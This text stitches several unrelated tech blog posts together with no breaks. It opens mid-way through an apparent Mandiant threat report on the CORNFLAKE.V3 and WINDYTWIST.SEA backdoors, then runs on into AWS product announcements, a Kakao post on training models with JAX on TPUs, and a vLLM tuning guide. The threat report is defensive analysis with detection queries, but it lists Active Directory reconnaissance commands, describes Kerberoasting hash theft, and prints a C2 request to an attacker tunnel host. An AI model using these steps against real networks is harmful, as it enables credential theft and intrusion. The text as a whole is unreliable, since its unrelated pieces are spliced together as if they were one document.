Query Active Directory Computer Count: Attempts to connect to Active Directory and count the total number of computer objects registered in the domain.
Display Detailed User Context: Executes whoami /all to reveal the current user’s Security Identifier (SID), domain and local group memberships, and assigned security privileges.
Enumerate Domain Trusts: Executes nltest /domain_trusts to list all domains that the current computer’s domain has trust relationships with (both incoming and outgoing).
List Domain Controllers: Executes nltest /dclist: to find and list the available Domain Controllers (DCs) for the computer’s current domain.
Query Service Principal Names (SPNs): Executes setspn -T <UserDomain> -Q */* to query for all SPNs registered in the user’s logon domain, then filters the results (Select-String) to specifically highlight SPNs potentially associated with user accounts (lines starting CN=…Users).
Not Domain Joined
Enumerate Local Groups: Uses Get-LocalGroup to list all security groups defined locally on the machine.
Enumerate Local Group Members: For each local group found, uses Get-LocalGroupMember to list the accounts (users or other groups) that are members of that group, displaying their Name and PrincipalSource (e.g., Local, MicrosoftAccount).
Kerberoasting
The second script executed is a batch script which attempts to harvest credentials via Kerberoasting. The script queries Active Directory for user accounts configured with SPNs (often an indication of a service account using user credentials). For each of these, it requests a Kerberos service ticket from which a password hash is extracted and formatted. These hashes are exfiltrated to the C2 server, where the attacker can attempt to crack them.
Mandiant Threat Defense recently observed a new PHP-based CORNFLAKE.V3 variant which has similar functionality to the previous Node.js based iterations.
This version was dropped by an in-memory script which was executed as a result of interaction with a malicious ClickFix lure page.
The script downloads the PHP package from windows.php[.]net, writes it to disk as php.zip, and extracts its contents to the C:\Users\<User>\AppData\Roaming\php directory. The CORNFLAKE.V3 PHP sample is contained in the config.cfg file, which was also dropped in the same directory and executed via the extracted PHP binary with command-line arguments passed to the interpreter.
To maintain persistence on the host, this variant utilizes a registry Run key named after a randomly chosen directory in %APPDATA% or %LOCALAPPDATA%, instead of the fixed ChromeUpdater string used in the Node.js version. To communicate with its C2, a unique path is generated for each request, unlike the static /init1234 path:
POST /ue/2&290cd148ed2f4995f099b7370437509b/fTqvlt HTTP/1.1
Host: varying-rentals-calgary-predict.trycloudflare[.]com
Connection: close
Content-Length: 39185
Content-type: application/octet-stream
Much like the Node.js version, the last byte of the received payload determines the payload type, however, these values differ in the PHP version:
Command | Type | Notes
0 | EXE | The decrypted content is saved to a temporary executable file (<rand_8_char>.exe) created in a random directory within the user’s %APPDATA% folder, and executed through PowerShell as a hidden process.
1 | DLL | The decrypted content is saved as a <rand_8_char>.png file in a temporary directory within the user’s %APPDATA% folder. Subsequently, rundll32.exe is invoked to execute the downloaded file.
2 | JS | The decrypted content is saved as a <rand_8_char>.jpg file in a temporary directory within the user’s %APPDATA% folder. The script attempts to check if Node.js is installed. If Node.js is not found or fails to install from a hardcoded URL (http://nodejs[.]org/dist/v21.7.3/node-v21.7.3-win-x64.zip), an error message is printed. If Node.js is available, the downloaded JavaScript (.jpg) file is executed using node.exe.
3 | CMD | The decrypted data is executed as a provided command string via cmd.exe or powershell.exe.
4 | ACTIVE | This command reports the active_cnt (stored in the $qRunq global variable) to the C2 server. This likely serves as a heartbeat or activity metric for the implant.
5 | AUTORUN | The malware attempts to establish persistence by adding a registry entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run that points to the script’s PHP binary and its own path.
6 | OFF | This command directly calls exit(0), which terminates the PHP script’s execution.
N/A | OTHER | If none of the specific commands match, the received data is saved as a .txt file in a temporary directory within the user’s %APPDATA% folder.
The JavaScript payload execution functionality was retained by implementing the download of the Node.js runtime environment inside the JS command. Other notable changes include changing the DLL and JS payload file extensions to .png and .jpg to evade detection, and the addition of the ACTIVE and AUTORUN commands. However, the main functionality of the backdoor remains unchanged despite the transition from Node.js to PHP.
These changes suggest an ongoing effort by the threat actor to refine their malware against evolving security measures.
Executed Payloads
Active Directory Reconnaissance
A cmd.exe reconnaissance payload similar to the one encountered in the Node.js variant was received from the C2 server and executed. The script checks if the machine is part of an Active Directory domain and collects the following information using PowerShell:
Domain Joined
Total count of computer accounts in AD.
Domain trust relationships.
List of all Domain Controllers.
Members of the “Domain Admins” group.
User accounts configured with a Service Principal Name (SPN).
All local groups and their members
Current User name, SID, local group memberships and security privileges
Not Domain Joined
All local groups and their members
Current User name, SID, local group memberships and security privileges
WINDYTWIST.SEA Backdoor
Following the interaction with its C2 server, a DLL payload (corresponding to command 1) was received, written to disk as C:\Users\<User>\AppData\Roaming\Shift194340\78G0ZrQi.png, and executed using rundll32. This file was a WINDYTWIST.SEA backdoor implant configured with its own set of C2 servers.
This implant is a C version of the Java WINDYTWIST backdoor, which supports relaying TCP traffic, providing a reverse shell, executing commands, and deleting itself. In previous intrusions, Mandiant observed WINDYTWIST.SEA samples attempting to move laterally in the network of the infected machine.
This investigation highlights the collaborative nature of modern cyber threats, where UNC5518 leverages compromised websites and deceptive ClickFix lures to gain initial access. This access is then utilized by other actors like UNC5774, who deploy versatile malware such as the CORNFLAKE.V3 backdoor. The subsequent reconnaissance and credential harvesting activities we observed indicate that the attackers intend to move laterally and expand their foothold in the environment.
To mitigate malware execution through ClickFix, organizations should disable the Windows Run dialog box where possible. Regular simulation exercises are crucial to counter this and other social engineering tactics. Furthermore, robust logging and monitoring systems are essential for detecting the execution of subsequent payloads, such as those associated with CORNFLAKE.V3.
Acknowledgements
Special thanks to Diana Ion, Yash Gupta, Rufus Brown, Mike Hunhoff, Genwei Jiang, Mon Liclican, Preston Lewis, Steve Sedotto, Elvis Miezitis and Rommel Joven for their valuable contributions to this blog post.
Detection Through Google Security Operations
For detailed guidance on hunting for this activity using the following queries, and for a forum to engage with our security experts, please visit our companion post on the Google Cloud Community blog.
Mandiant has made the relevant rules available in the Google SecOps Mandiant Frontline Threats curated detections rule set. The activity discussed in the blog post is detected in Google SecOps under the rule names:
Powershell Executing NodeJS
Powershell Writing To Appdata
Suspicious Clipboard Interaction
NodeJS Reverse Shell Execution
Download to the Windows Public User Directory via PowerShell
Run Utility Spawning Suspicious Process
WSH Startup Folder LNK Creation
Trycloudflare Tunnel Network Connections
SecOps Hunting Queries
The following UDM queries can be used to identify potential compromises within your environment.
Execution of CORNFLAKE.V3 — Node.js
Search for potential compromise activity where PowerShell is used to launch node.exe from an %AppData% path with the -e argument, indicating direct execution of a malicious JavaScript string.
Search for compromise activity where PowerShell is executing php.exe from an %AppData% path. This variant is characterized by the use of the -d argument, executing a PHP script without a .php file extension, and passing the argument 1 to the PHP interpreter, indicating covert execution of malicious PHP code.
Search for suspicious process activity where cmd.exe or powershell.exe is spawned as a child process of node.exe or php.exe when those executables are located in %AppData%.
Search for unusual network connections initiated by powershell.exe or mshta.exe to legitimate Node.js (nodejs.org) or PHP (windows.php.net) infrastructure domains.
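The same hunting logic can be approximated outside Google SecOps. The sketch below is not a UDM query; it is a hedged Python example that assumes a CSV export of process-creation events with hypothetical columns parent_path, process_path, and command_line, and applies the patterns above: node.exe or php.exe running from an %AppData% path with -e or -d arguments, or spawning cmd.exe or powershell.exe.
# Hypothetical local triage sketch over exported process events; the file name
# and column names (parent_path, process_path, command_line) are assumptions.
import csv
import re

APPDATA_INTERPRETER = re.compile(r"\\appdata\\roaming\\.*\\(node|php)\.exe$", re.I)
SHELL = re.compile(r"\\(cmd|powershell)\.exe$", re.I)

def is_suspicious(row: dict) -> bool:
    proc = row.get("process_path", "")
    parent = row.get("parent_path", "")
    cmdline = row.get("command_line", "")
    # node.exe/php.exe launched from %AppData% with inline-code arguments.
    if APPDATA_INTERPRETER.search(proc) and re.search(r"\s-(e|d)\b", cmdline):
        return True
    # Shells spawned by an %AppData%-resident node.exe or php.exe parent.
    return bool(SHELL.search(proc) and APPDATA_INTERPRETER.search(parent))

with open("process_events.csv", newline="", encoding="utf-8") as handle:
    for row in csv.DictReader(handle):
        if is_suspicious(row):
            print(row.get("parent_path"), "->", row.get("process_path"),
                  row.get("command_line"))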
Today, AWS announces the general availability of AWS Billing and Cost Management Dashboards, a new feature within AWS Billing and Cost Management that helps you visualize and analyze your AWS spending in one consolidated view. This feature enables you to create customized dashboards that combine data from AWS Cost Explorer and Savings Plans and Reserved Instance coverage and utilization reports. With Billing and Cost Management Dashboards, you can quickly understand your AWS cost patterns and make informed financial decisions for your organization.
Billing and Cost Management Dashboards allows you to create and customize widgets using various widget types, including cost widgets, usage widgets, Savings Plans utilization and coverage widgets, and Reserved Instances utilization and coverage widgets. Each widget can be configured with different visualizations, such as line charts, bar charts, stacked bar charts, or tables, and you can customize dashboard layouts by adjusting widget sizes and positions. You can share these dashboards across accounts within or outside your organization, enabling FinOps teams to establish standardized cost reporting practices throughout their organization.
AWS Billing and Cost Management Dashboards is available at no additional cost in all AWS commercial Regions, excluding AWS China Regions. To get started with AWS Billing and Cost Management Dashboards, visit the AWS Billing and Cost Management console and select “Dashboards” from the left navigation menu. For more information, see the AWS Billing and Cost Management Dashboards user guide or blog.
AWS Clean Rooms now supports error message configurations for PySpark, enabling companies and their partners to develop and test sophisticated analytics faster in a Clean Rooms collaboration. With this launch, you and your partners can specify how much information appears in error messages for analyses that use PySpark, the Python API for Apache Spark. Code authors can configure a PySpark analysis to return detailed error messages when a PySpark analysis fails, provided that each collaboration member approves the analysis to run on their data. For example, when a code author is testing their code for a marketing attribution model in a clean rooms collaboration, they can enable detailed error messages for faster troubleshooting, reducing time-to-insights from weeks to hours or days.
AWS Clean Rooms helps companies and their partners easily analyze and collaborate on their collective datasets without revealing or copying one another’s underlying data. For more information about the AWS Regions where AWS Clean Rooms is available, see the AWS Regions table. To learn more about collaborating with AWS Clean Rooms, visit AWS Clean Rooms.
On August 5, 2025, AWS announced the availability of two new OpenAI models with open weights in Amazon Bedrock. Today, we’re simplifying access to these foundation models by making them automatically available to all Amazon Bedrock users, eliminating the need to explicitly enable model access. Customers can immediately start using these models through the Amazon Bedrock console playground or through Amazon Bedrock’s unified API in the AWS SDKs, in the Regions where the models are available.
This streamlined access enables customers to quickly begin using OpenAI’s gpt-oss-120b and gpt-oss-20b models without needing to manually activate model access. Soon, we will extend this simplified access approach to other existing non-legacy serverless models in Amazon Bedrock. Going forward, Amazon Bedrock will launch all new serverless foundation models with default access for AWS accounts. Account administrators retain full control over model access through IAM policies and Service Control Policies (SCPs) to restrict model usage as needed.
Amazon Managed Streaming for Apache Kafka (Amazon MSK) now supports Graviton3-based M7g instances for Standard brokers for MSK Provisioned clusters in AWS GovCloud (US-West), AWS GovCloud (US-East), Asia Pacific (Jakarta), Asia Pacific (Melbourne), Asia Pacific (Osaka), Europe (Zurich), Israel (Tel Aviv), and Asia Pacific (Hong Kong) Regions.
Graviton M7g instances for Standard brokers deliver up to 24% compute cost savings and up to 29% higher write and read throughput over comparable MSK clusters running on M5 instances.
You can now generate AI-powered forecasts and visualizations on time-series data that has been indexed into Amazon OpenSearch 3.1+ domains.
Forecasts can enhance a range of analytics use cases, powering insights into trends in infrastructure utilization and events, application and business metrics, and more. They can help you anticipate upcoming changes in areas such as website traffic and system performance. You can easily get started with this feature by setting up forecasts within OpenSearch Dashboards or the OpenSearch UI. No data science or AI expertise is required.
AI-powered forecasts are available in all Amazon OpenSearch Service regions that support OpenSearch 3.1 domains. Learn more from the documentation.
When your messaging platform serves 49 million people – 93% of South Korea’s population – every technical decision carries enormous weight. The engineering team at Kakao faced exactly this challenge when their existing infrastructure hit critical limitations. Their solution? A strategic shift to Google Cloud TPUs using the JAX framework that not only solved their immediate scalability needs but opened new possibilities for advanced AI model development.
Kakao’s approach provides a compelling example of leveraging the high-performance array computing framework JAX for AI model development at scale. While their primary training environment was GPU-based, the team made a strategic decision to adopt the JAX stack on Google Cloud TPUs to optimize for cost and efficiency.
This work laid the groundwork for the development of their proprietary Kanana model family, and several Kanana models — including Kanana-MoE — have recently been released as open source on Hugging Face Hub.
In this post, Minho Ryu and Nayeon Kim detail Kakao’s technical journey. They cover their specific implementation details, from adapting MaxText, a JAX-based large language model framework, for custom data pipelines, to their work on mixture-of-experts (MoE) model training.
Kakao’s journey by Minho and Nayeon:
As engineers at Kakao, we develop models that serve KakaoTalk, a platform supporting services that extend far beyond text. Our rich ecosystem includes chat with over 700,000 images and stickers (emojis), voice and video calls, finance, and navigation.
KakaoTalk’s massive scale and complexity demand that our language models are not only highly efficient but also excel at understanding the Korean language and are flexible enough for diverse applications. These real-world product requirements directly influenced our technical decisions and our need for a customizable training framework.
Our journey with JAX began at an important inflection point. Our existing GPU-based infrastructure was reaching power and budget capacity constraints. We had two options: expand our GPU infrastructure and maintain our existing codebase, or adopt Cloud TPUs, which offered cost-performance advantages while requiring adoption of a new toolchain. We chose Cloud TPUs, viewing the short-term investment as worthwhile for long-term cost-performance benefits, and built our stack on JAX.
We use XPK for Kubernetes cluster management, which simplifies job creation and management on GKE without requiring Kubernetes expertise. For the data pipeline, we adopted Grain due to its deterministic behavior, which is essential for the stability of long-running AI model training jobs.
We focused on adapting the MaxText framework to fit our specific research and compatibility needs. We made two key customizations to the pipeline:
1. Multi-source data blending: When we began exploring training with MaxText, it assumed a single, pre-mixed corpus. Our research requires blending different data sources — such as web text, code, and math — with specific, dynamically adjusted weights during different training phases. To achieve this flexibility without reprocessing terabytes of data for each experiment, we implemented a solution using Grain’s mix function (a minimal sketch follows this list). This approach allows us to define blending ratios in our configuration, providing the adaptability essential for our iterative research process. We filed a PR for this feature to be supported in MaxText natively, and it has since been incorporated here.
2. Token Processing for Efficiency and Compatibility: To maintain compatibility with our existing Megatron-LM pipeline and improve efficiency, we modified MaxText’s token processing logic. Our data preparation method constructs each training sequence by appending the first token of the subsequent sequence. This creates overlapping, continuous sequences, ensuring that no information is lost at the boundaries and maximizing data utilization.
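To make the blending mechanism in item 1 concrete, here is a minimal sketch assuming Grain's MapDataset.mix API; the sources, weights, and exact method names are illustrative only and may differ across Grain versions and from Kakao's actual pipeline.
```
# A minimal sketch of weighted multi-source blending with Grain.
# Sources and weights are hypothetical; API names may differ across Grain versions.
import grain

# In practice these would wrap ArrayRecord/TFRecord readers rather than in-memory lists.
web_ds = grain.MapDataset.source(["web_doc_0", "web_doc_1", "web_doc_2", "web_doc_3"])
code_ds = grain.MapDataset.source(["code_doc_0", "code_doc_1", "code_doc_2"])
math_ds = grain.MapDataset.source(["math_doc_0", "math_doc_1"])

# Blend with configurable ratios (e.g. 70% web, 20% code, 10% math). Adjusting
# these weights per training phase avoids reprocessing the raw corpora.
mixed_ds = grain.MapDataset.mix(
    datasets=[web_ds, code_ds, math_ds],
    weights=[0.7, 0.2, 0.1],
)

for i in range(len(mixed_ds)):
    print(mixed_ds[i])
```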
To validate our new TPU-based workflow, we trained two models. First, we trained the Kanana 2.1 billion parameter model from scratch, and the results demonstrated that our MaxText implementation achieved performance comparable to our existing GPU-based Megatron-LM pipeline at each stage. Second, we performed depth upscaling with continued pre-training from our existing 8B model to a 9.8B architecture. Both approaches succeeded and showed consistent improvements across various benchmarks, confirming that the results on GPU were effectively reproduced on TPU.
Advancing our approach: Training Mixture-of-Experts (MoE) models with MaxText
With the core pipeline validated, we began experimenting with more advanced architectures, specifically MoE models, to build inference-efficient models that maintain strong performance. Our objectives were to explore upcycling an existing dense model into an MoE structure and to evaluate the suitability of the TPU and MaxText stack for this task.
For the experiment, we upcycled our 2.1B dense model into a 13.4B parameter (2.3B active) MoE architecture with 64 experts and 8 active experts per token. We trained this model on the exact same dataset as the original dense model to isolate the impact of the architectural change. The training was performed on v5e TPUs using MaxText with Fully Sharded Data Parallelism (FSDP).
The implementation process was straightforward. We found that MaxText’s flexible design, built on Flax, Optax, and Orbax, was well-suited for the wide range of ablations required for MoE research. Specifically:
Integrated Kernels: Megablocks MoE kernels, which support optimized MoE features like Group GEMM, were already integrated into JAX.
Combining Schedules: We used the optax.join_schedules function to combine multiple learning rate schedules (e.g. warmup, constant, and annealing) into a single, custom schedule for our training run. This ability to combine different schedules is very useful for experimenting with different training strategies; a minimal sketch follows this list.
Code Customization: We needed to enable the load balancing loss for our sparse matmul implementation. This required inserting a single line of code in the permute function within the MoE block of MaxText to calculate the loss directly from the router logits.
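To make the schedule-joining point concrete, here is a minimal sketch of a warmup, then constant, then annealing learning-rate schedule built with optax.join_schedules; the step counts and rates are placeholders rather than Kakao's actual settings.
```
# A minimal sketch of a warmup -> constant -> annealing learning-rate schedule
# built with optax.join_schedules. All step counts and rates are placeholders.
import optax

warmup_steps = 2_000
constant_steps = 50_000
anneal_steps = 20_000
peak_lr = 3e-4

schedule = optax.join_schedules(
    schedules=[
        # Linear warmup from 0 to the peak learning rate.
        optax.linear_schedule(init_value=0.0, end_value=peak_lr, transition_steps=warmup_steps),
        # Hold the peak learning rate constant.
        optax.constant_schedule(peak_lr),
        # Cosine annealing toward zero at the end of training.
        optax.cosine_decay_schedule(init_value=peak_lr, decay_steps=anneal_steps),
    ],
    # Boundaries are the global step counts at which each schedule hands off to the next.
    boundaries=[warmup_steps, warmup_steps + constant_steps],
)

# The joined schedule plugs directly into an optimizer, e.g. AdamW.
optimizer = optax.adamw(learning_rate=schedule)
print(schedule(0), schedule(warmup_steps), schedule(warmup_steps + constant_steps + anneal_steps))
```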
The results showed performance improvements, particularly in code and math benchmarks, suggesting domain specialization among the experts.
Performance Evaluation
This met our objectives and further demonstrated the JAX stack’s utility for advanced model development. We are now extending this work by experimenting with shared experts and replacing initial MoE layers with dense layers, modifications which are simple to implement within the MaxText framework.
Performance improvements and key takeaways
During our work, we gained early access to Trillium TPUs. We managed the transition from v5e by changing a few parameters in our XPK cluster and workload configurations. We observed an immediate and substantial throughput increase of 2.7x across our models, along with improved cost-performance efficiency.
Based on our experience, the JAX stack on TPUs provides a comprehensive and efficient environment for AI model development. The key advantages for our team include:
Performance and scalability: The JAX and XLA combination provides just-in-time compilation, and MaxText is optimized for large-scale parallel computing with support for paradigms like SPMD and FSDP.
Customizability and control: The codebase, being pure Python and built on libraries like Flax, Optax, and Orbax is intuitive and easy to modify. This allows us to implement custom data pipelines, training strategies, and novel architectures with minimal overhead.
Rapid feature adoption: The MaxText framework is updated quickly with features from new state-of-the-art models, allowing us to stay current with our research.
These strengths have made the JAX stack a powerful and flexible foundation for our work in training large language models at Kakao.
Build your Language Models with the JAX Ecosystem:
Kakao’s journey demonstrates how the JAX ecosystem’s modular design — including MaxText, Flax, Optax, and Orbax — enables the customization required for both production pipelines and advanced research, from tailored data blending to rapid experimentation with MoE architectures.
Our sincere thanks to Minho, Nayeon and their team for sharing their insightful engineering work. We look forward to seeing how they and other leading enterprises worldwide continue to use the JAX ecosystem to build the next generation of powerful and efficient language models.
Additional contributors include Hossein Sarshar and Ashish Narasimham.
Large Language Models (LLMs) are revolutionizing how we interact with technology, but serving these powerful models efficiently can be a challenge. vLLM has rapidly become the primary choice for serving open source large language models at scale, but using vLLM is not a silver bullet. Teams that are serving LLMs for downstream applications have stringent latency and throughput requirements that necessitate a thorough analysis of which accelerator to run on and what configuration offers the best possible performance.
This guide provides a bottom-up approach to determining the best accelerator for your use case and optimizing your vLLM configuration to achieve the best and most cost-effective results possible.
Note: This guide assumes that you are familiar with GPUs, TPUs, vLLM, and the underlying features that make it such an effective serving framework.
Choosing the right accelerator can feel like an intimidating process because each inference use case is unique. There is no a priori ideal setup from a cost/performance perspective; we can’t say model X should always be run on accelerator Y.
The following considerations need to be taken into account to best determine how to proceed:
What model are you using?
Our example model is google/gemma-3-27b-it. This is a 27-billion parameter instruction-tuned model from Google’s Gemma 3 family.
What is the precision of the model you’re using?
We will use bfloat16 (BF16).
Note: Model precision determines the number of bytes used to store each model weight. Common options are float32 (4 bytes), float16 (2 bytes), and bfloat16 (2 bytes). Many models are now also available in quantized formats like 8-bit, 4-bit (e.g., GPTQ, AWQ), or even lower. Lower precision reduces memory requirements and can increase speed, but may come with a slight trade-off in accuracy.
Workload characteristics: How many requests/second are you expecting?
We are targeting support for 100 requests/second.
What is the average sequence length per request?
Input Length: 1500 tokens
Output Length: 200 tokens
The total sequence length per request is therefore 1500 + 200 = 1700 tokens on average.
What is the maximum total sequence length we will need to be able to handle?
Let’s say in this case it is 2000 total tokens.
What is the GPU Utilization you’ll be using?
The gpu_memory_utilization parameter in vLLM controls how much of the GPU’s VRAM is pre-allocated for the KV cache (given the allocated memory for the model weights). By default, this is 90% in vLLM, but we generally want to set this as high as possible to optimize performance without causing OOM issues – which is how our auto_tune.sh script works (as described in the “Benchmarking, Tuning and Finalizing Your vLLM Configuration” section of this post).
What is your prefix cache rate?
This will be determined from application logs, but we’ll estimate 50% for our calculations.
Note: Prefix caching is a powerful vLLM optimization that reuses the computed KV cache for shared prefixes across different requests. For example, if many requests share the same lengthy system prompt, the KV cache for that prompt is calculated once and shared, saving significant computation and memory. The hit rate is highly application-specific. You can estimate it by analyzing your request logs for common instruction patterns or system prompts.
What is your latency requirement?
The end-to-end latency from request to final token should not exceed 10 seconds (P99 E2E). This is our primary performance constraint.
Selecting Accelerators (GPU/TPU)
We live in a world of resource scarcity! What does this mean for your use case? You could almost certainly get the best possible latency and throughput by using the most up-to-date hardware, but as an engineer it makes little sense to do so when you can meet your requirements at a better price/performance point.
We can refer to our Cloud TPU offerings to determine which TPUs are viable candidates.
The following are examples of accelerators that can be used for our workloads, as we will see in the following Calculate Memory Requirements section.
Each option requires a different Tensor Parallelism (TP) configuration depending on its total VRAM. Please see the “Is Tensor Parallelism Required?” section below for an explanation of Tensor Parallelism.
GPU Options
L4 GPUs
g2-standard-48 instance provides 4xL4 GPUs with 96 GB of GDDR6
TP = 4
A100 GPUs
a2-ultragpu-1g instance provides 1xA100 GPU with 80 GB of HBM
TP = 1
H100 GPUs
a3-highgpu-1g instance provides 1xH100 GPU with 80 GB of HBM
TP = 1
TPU Options
TPU v5e (16 GB of HBM per chip)
v5litepod-8 provides 8 v5e TPU chips with 128GB of total HBM
TP = 8
TPU v6e aka Trillium (32 GB of HBM per chip)
v6e-4 provides 4 v6e TPU chips with 128GB of total HBM
TP = 4
Calculate Memory Requirements
We must estimate the total minimum VRAM needed. This will tell us if the model can fit on a single accelerator or if we need to use parallelism. Memory utilization can be broken down into two main components: static memory (model weights, activations, and overhead) and KV cache memory.
model_weight is equal to the number of parameters x a constant depending on parameter data type/precision
non_torch_memory is a buffer for memory overhead (estimated ~1GB)
pytorch_activation_peak_memory is the memory required for intermediate activations
kv_cache_memory_per_batch is the memory required for the KV cache per batch
batch_size is the number of sequences that will be processed simultaneously by the engine
A batch size of one is not a realistic value, but it does provide us with the minimum VRAM we will need for the engine to get off the ground. You can vary this parameter in the calculator to see just how much VRAM we will need to support our larger batch sizes of 128 – 512 sequences.
In our case, we find that we need a minimum of ~57 GB of VRAM to run gemma-3-27b-it on vLLM for our specific workload.
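The arithmetic behind that figure can be reproduced with a short script. The sketch below mirrors the components listed above; the activation buffer and the Gemma 3 27B architecture numbers (layers, KV heads, head dimension) are assumptions for illustration, so pull the real values from the model's config.json before relying on them.
```
# Rough minimum-VRAM estimate for serving google/gemma-3-27b-it in BF16 on vLLM.
# Architecture numbers and the activation buffer are assumptions; read the real
# values from the model's config.json.

def estimate_vram_gb(
    num_params=27e9,           # gemma-3-27b-it parameter count
    bytes_per_param=2,         # BF16
    num_layers=62,             # assumed; check config.json
    num_kv_heads=16,           # assumed; check config.json
    head_dim=128,              # assumed; check config.json
    max_seq_len=2000,          # max total sequence length for our workload
    batch_size=1,              # minimum viable batch just to start the engine
    non_torch_memory_gb=1.0,   # overhead buffer, as estimated above
    activation_peak_gb=1.5,    # assumed peak activation memory
):
    model_weight_gb = num_params * bytes_per_param / 1e9
    # KV cache: 2 tensors (K and V) per layer, per KV head, per token.
    kv_bytes_per_token = 2 * num_layers * num_kv_heads * head_dim * bytes_per_param
    kv_cache_gb = kv_bytes_per_token * max_seq_len * batch_size / 1e9
    return model_weight_gb + non_torch_memory_gb + activation_peak_gb + kv_cache_gb

print(f"Estimated minimum VRAM: {estimate_vram_gb():.1f} GB")  # ~57.5 GB with these assumptions
```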
Is Tensor Parallelism Required?
In this case, the answer is that parallelism is not necessarily required, but we could and should consider our options from a price/performance perspective. Why does it matter?
Very quickly: what is Tensor Parallelism? At the highest level, Tensor Parallelism is a method of splitting a large model across multiple accelerators (GPU/TPU) so that a model too large for a single device can still fit in memory. See here for more information.
vLLM supports Tensor Parallelism (TP). With tensor parallelism, accelerators must constantly communicate and synchronize with each other over the network for the model to work. This inter-accelerator communication can add overhead, which has a negative impact on latency. This means we have a tradeoff between cost and latency in our case.
Note: Tensor parallelism is required for TPUs because of the size of this model. v5e and v6e have 16 GB and 32 GB of HBM per chip respectively, as mentioned above, so multiple chips are required to hold the model. In this guide, v6e-4 pays a slight performance penalty for this communication overhead while our 1xH100 instance will not.
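For reference, this is roughly what launching a tensor-parallel vLLM server looks like; the flags shown reflect this guide's workload, and the invocation is a sketch rather than the exact command used in the benchmarks below.
```
# Sketch: serving gemma-3-27b-it with tensor parallelism across 4 accelerators
# (e.g. 4xL4 or a v6e-4). On a single H100/A100 80GB, --tensor-parallel-size 1 suffices.
vllm serve google/gemma-3-27b-it \
  --tensor-parallel-size 4 \
  --max-model-len 2000 \
  --gpu-memory-utilization 0.90 \
  --dtype bfloat16
```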
Benchmarking, Tuning and Finalizing Your vLLM Configuration
Now that you have your short list of accelerator candidates (4xL4, 1xA100-80GB, 1xH100-80GB, TPU v5e-8, TPU v6e-4), it is time to see the best level of performance we can achieve across each potential setup. We will only cover the H100 and Trillium (v6e) benchmarking and tuning in this section, but the process would be nearly identical for the other accelerators:
Launch, SSH, Update VMs
Pull vLLM Docker Image
Update and Launch Auto Tune Script
Analyze Results
H100 80GB
In your project, open the Cloud Shell and enter the following command to launch an a3-highgpu-1g instance. Be sure to update your project ID accordingly and select a zone that supports the a3-highgpu-1g machine type for which you have quota.
Now that we’re in our running instance, we can go ahead and pull the latest vLLM Docker image and then run it interactively. A final detail – if we are using a gated model (and we are in this demo) we will need to provide our HF_TOKEN in the container:
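Pulling and entering the container typically looks something like the following sketch; the image tag is an assumption, so adjust it to your environment and pin a specific version for reproducibility.
```
# Pull the vLLM OpenAI-compatible serving image and start an interactive shell,
# passing the Hugging Face token needed for gated models.
docker pull vllm/vllm-openai:latest

docker run --gpus all -it --rm \
  -e HF_TOKEN=<your_hugging_face_token> \
  --entrypoint /bin/bash \
  vllm/vllm-openai:latest
```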
In our running container, we can now find a file called vllm-workspace/benchmarks/auto_tune/auto_tune.sh which we will need to update with the information we determined above to tune our vLLM configuration for the best possible throughput and latency.
```
# navigate to correct directory
cd benchmarks/auto_tune

# update the auto_tune.sh script - use your preferred script editor
nano auto_tune.sh
```
In the auto_tune.sh script, you will need to make the following updates:
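Roughly speaking, the edits map the workload parameters defined earlier onto the script's variables. The variable names below are assumptions based on the values referenced elsewhere in this guide (MODEL, OUTPUT_LEN, MAX_LATENCY_ALLOWED_MS, and so on); match them against your copy of auto_tune.sh, since names can change between vLLM versions.
```
# Workload-specific values to set near the top of auto_tune.sh (names are assumptions).
MODEL="google/gemma-3-27b-it"
TP=1                                      # tensor parallel size for a single H100 80GB
INPUT_LEN=1500                            # average input tokens per request
OUTPUT_LEN=200                            # average output tokens per request
MIN_CACHE_HIT_PCT=50                      # estimated prefix cache hit rate (%)
MAX_LATENCY_ALLOWED_MS=10000              # P99 end-to-end latency budget
NUM_SEQS_LIST="128 256"                   # max_num_seqs values to sweep
NUM_BATCHED_TOKENS_LIST="512 1024 2048"   # max_num_batched_tokens values to sweep
```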
Our auto_tune.sh script downloads the required model and attempts to start a vLLM server at the highest possible gpu_utilization (0.98 by default). If a CUDA OOM occurs, we go down 1% until we find a stable configuration.
Troubleshooting Note: In rare cases, a vLLM server may be able to start during the initial gpu_utilization test but then fail due to CUDA OOM at the start of the next benchmark. Alternatively, the initial test may fail and then not spawn a follow up server resulting in what appears to be a hang. If either happens, edit the auto_tune.sh near the very end of the file so that gpu_utilization begins at 0.95 or a lower value rather than beginning at 0.98.
Troubleshooting Note: By default, the --profile flag is passed to the benchmark_serving.py script. In some cases this may cause the process to hang if the GPU profiler cannot handle the large number of requests for that specific model. You can confirm this by reviewing the logs for the current run; if the logs include the following line with an indefinite hang afterwards, you’ve run into this problem:
```
INFO 08-13 09:15:58 [api_server.py:1170] Stopping profiler...
# Extensive wait time with only a couple additional logs
```
If that is the case, simply remove the --profile flag from the benchmark_serving.py call in the auto_tune.sh script under the run_benchmark() function:
```
# REMOVE PROFILE FLAG IF HANG OCCURS
python3 benchmarks/benchmark_serving.py \
    --backend vllm \
    --model $MODEL \
    --dataset-name random \
    --random-input-len $adjusted_input_len \
    --random-output-len $OUTPUT_LEN \
    --ignore-eos \
    --disable-tqdm \
    --request-rate inf \
    --percentile-metrics ttft,tpot,itl,e2el \
    --goodput e2el:$MAX_LATENCY_ALLOWED_MS \
    --num-prompts 1000 \
    --random-prefix-len $prefix_len \
    --port 8004 \
    --profile &> "$bm_log"  # Remove this flag, making sure to keep the &> "$bm_log" on the line above
```
Then, for each permutation of num_seqs_list and num_batched_tokens, a server is spun up and our workload is simulated.
A benchmark is first run with an infinite request rate.
If the resulting P99 E2E Latency is within the MAX_LATENCY_ALLOWED_MS limit, this throughput is considered the maximum for this configuration.
If the latency is too high, the script performs a search by iteratively decreasing the request rate until the latency constraint is met. This finds the highest sustainable throughput for the given parameters and latency requirement.
In the result.txt file at /vllm-workspace/auto-benchmark/$TAG/result.txt, we will find which combination of parameters is most efficient, and we can then take a closer look at that run:
Let’s look at the best-performing result to understand our position:
max_num_seqs: 256, max_num_batched_tokens: 512
These were the settings for the vLLM server during this specific test run.
request_rate: 6
This is the final input from the script’s loop. It means your script determined that sending 6 requests per second was the highest rate this server configuration could handle while keeping latency below 10,000 ms. If it tried 7 req/s, the latency was too high.
e2el: 7612.31
This is the P99 latency that was measured when the server was being hit with 6 req/s. Since 7612.31 is less than 10000, the script accepted this as a successful run.
throughput: 4.17
This is the actual, measured output. Even though you were sending requests at a rate of 6 per second, the server could only successfully process them at a rate of 4.17 per second.
